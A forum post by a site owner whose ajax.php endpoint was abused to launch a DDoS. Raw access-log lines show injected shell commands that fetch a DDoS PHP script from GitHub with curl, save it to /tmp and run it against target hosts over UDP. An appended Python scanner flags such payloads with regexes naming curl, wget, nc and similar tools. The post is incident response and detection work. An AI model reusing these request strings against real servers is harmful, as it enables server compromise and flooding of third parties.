My server was used to perpetrate a DDoS attack yesterday and it appears the general attack vector was through ajax.php.
For the moment, I've made ajax.php inaccessible, but I would appreciate any help closing this hole.
access.log:108.162.241.169 - - [27/May/2018:13:57:25 -0400] "GET /forums/ajax.php?ipn=curl%20https://raw.githubusercontent.com/drego85/DDoS-PHP-Script/dd72372ac9e3763318a8142719ef7da6cc0fa6a4/ddos.php%20%3E%20/tmp/temp.php HTTP/1.1" 200 39 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "200.7.102.116"
access.log:108.162.241.169 - - [27/May/2018:13:57:42 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php HTTP/1.1" 200 112 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "200.7.102.116"
access.log:108.162.241.169 - - [27/May/2018:13:58:15 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=TARGET%20port=PORT%20time=SECONDS HTTP/1.1" 200 184 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "200.7.102.116"
access.log:162.158.155.167 - - [27/May/2018:13:58:22 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=TARGET%20port=PORT%20time=SECONDS HTTP/1.1" 200 184 "-" "TelegramBot (like TwitterBot)" "149.154.167.166"
access.log:162.158.154.142 - - [27/May/2018:13:58:25 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=TARGET%20port=PORT%20time=SECONDS%60 HTTP/1.1" 200 39 "-" "TelegramBot (like TwitterBot)" "149.154.167.171"
access.log:108.162.241.169 - - [27/May/2018:14:01:30 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=200.7.102.116%20port=80%20time=60 HTTP/1.1" 200 291 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "200.7.102.116"
access.log:108.162.241.169 - - [27/May/2018:14:02:46 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=200.7.102.116%20port=80%20time=60&method=udp HTTP/1.1" 200 291 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "200.7.102.116"
access.log:108.162.241.169 - - [27/May/2018:14:02:48 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=200.7.102.116%20port=80%20time=10%20method=UDP HTTP/1.1" 200 85 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "200.7.102.116"
access.log:108.162.241.169 - - [27/May/2018:14:03:56 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=200.7.102.116%20port=80%20time=10&type=UDP HTTP/1.1" 200 287 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "200.7.102.116"
access.log:108.162.241.169 - - [27/May/2018:14:05:03 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php HTTP/1.1" 200 112 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "200.7.102.116"
access.log:108.162.241.169 - - [27/May/2018:14:06:32 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=200.7.102.116%20port=80%20time=20&type=UDP HTTP/1.1" 200 292 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "200.7.102.116"
access.log:162.158.63.223 - - [27/May/2018:14:51:28 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=62.210.180.159%20port=80%20time=120&type=UDP HTTP/1.1" 499 0 "-" "-" "192.157.56.130"
access.log:162.158.63.223 - - [27/May/2018:14:53:34 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=200.7.102.116%20port=80%20time=120&type=UDP&method=STOP HTTP/1.1" 499 0 "-" "-" "192.157.56.130"
access.log:162.158.63.223 - - [27/May/2018:14:54:56 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=81.129.199.237%20port=80%20time=60&type=UDP HTTP/1.1" 200 293 "-" "-" "192.157.56.130"
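Added example, not part of the original post: the requests above carry a shell command in the `ipn=` parameter (fetch a script with curl, write it to /tmp, run it with php), so the quickest way to measure the exposure from the access log is to decode every query parameter and flag values that contain shell metacharacters or command names. The scanner below does that for the log format shown in the post. The first three sample lines are copied from the post; the fourth benign line is constructed, and treating the trailing quoted field as the originating client address behind a proxy is an assumption of mine.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined log format plus the extra trailing quoted field present in the post's
# lines; the leading "access.log:" is grep output and is tolerated.
LOG_RE = re.compile(
    r'^(?:access\.log:)?(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"(?: "(?P<client>[^"]*)")?'
)

# Characters that let a value break out of, chain, or redirect a shell command.
SHELL_META = re.compile(r'[;|&`$<>(){}]')
# Tools used to fetch and execute a payload; the post's lines use curl and php.
SHELL_CMDS = re.compile(r'(?:^|\s)(?:curl|wget|php|sh|bash|perl|python|nc|chmod)\s')


def parse_line(line):
    """Split one log line into its fields; return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec['target'])
    rec['path'] = parts.path
    # parse_qs percent-decodes, so %20, %3E and %60 become ' ', '>' and '`'.
    rec['params'] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def injection_indicators(value):
    """Return the reasons a decoded parameter value looks like a shell command."""
    reasons = []
    if SHELL_META.search(value):
        reasons.append('shell metacharacter')
    if SHELL_CMDS.search(value):
        reasons.append('shell command')
    return reasons


def scan(lines):
    """Return one finding per parameter value that carries injection indicators."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for name, values in rec['params'].items():
            for value in values:
                reasons = injection_indicators(value)
                if reasons:
                    hits.append({
                        # Assumption: the trailing quoted field is the real client
                        # address and the first column is a proxy in front of the site.
                        'client': rec['client'] or rec['ip'],
                        'path': rec['path'],
                        'param': name,
                        'value': value,
                        'status': int(rec['status']),
                        'reasons': reasons,
                    })
    return hits


def clients(hits):
    """Count findings per originating client, for a block list or abuse report."""
    counts = {}
    for h in hits:
        counts[h['client']] = counts.get(h['client'], 0) + 1
    return counts


# First three lines copied from the post; the last one is a constructed benign request.
SAMPLE_LOG = [
    'access.log:108.162.241.169 - - [27/May/2018:13:57:25 -0400] "GET /forums/ajax.php?ipn=curl%20https://raw.githubusercontent.com/drego85/DDoS-PHP-Script/dd72372ac9e3763318a8142719ef7da6cc0fa6a4/ddos.php%20%3E%20/tmp/temp.php HTTP/1.1" 200 39 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "200.7.102.116"',
    'access.log:162.158.154.142 - - [27/May/2018:13:58:25 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=TARGET%20port=PORT%20time=SECONDS%60 HTTP/1.1" 200 39 "-" "TelegramBot (like TwitterBot)" "149.154.167.171"',
    'access.log:162.158.63.223 - - [27/May/2018:14:51:28 -0400] "GET /forums/ajax.php?ipn=php%20/tmp/temp.php%20host=62.210.180.159%20port=80%20time=120&type=UDP HTTP/1.1" 499 0 "-" "-" "192.157.56.130"',
    '203.0.113.5 - - [27/May/2018:13:50:00 -0400] "GET /forums/ajax.php?ipn=12345 HTTP/1.1" 200 39 "-" "Mozilla/5.0" "203.0.113.5"',
]

if __name__ == '__main__':
    for h in scan(SAMPLE_LOG):
        print(h['client'], h['status'], h['param'], '=', h['value'], '->', ', '.join(h['reasons']))
```

Run it against the full access.log (one line per list entry) to get the complete set of payloads and originating addresses; a 200 with a non-zero body on a line that the scanner flags means the command most likely ran, whereas the 499 lines show the client disconnecting before the response, which is consistent with a long-running flood command rather than a failed one.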